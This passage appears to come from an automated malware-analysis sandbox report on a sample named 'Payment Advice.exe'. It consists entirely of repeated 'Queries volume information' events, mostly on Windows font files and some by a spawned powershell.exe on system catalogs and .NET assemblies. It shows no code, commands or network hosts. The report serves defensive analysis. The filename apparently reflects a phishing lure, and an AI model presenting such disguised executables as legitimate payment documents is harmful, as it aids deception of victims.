                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Payment Advice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
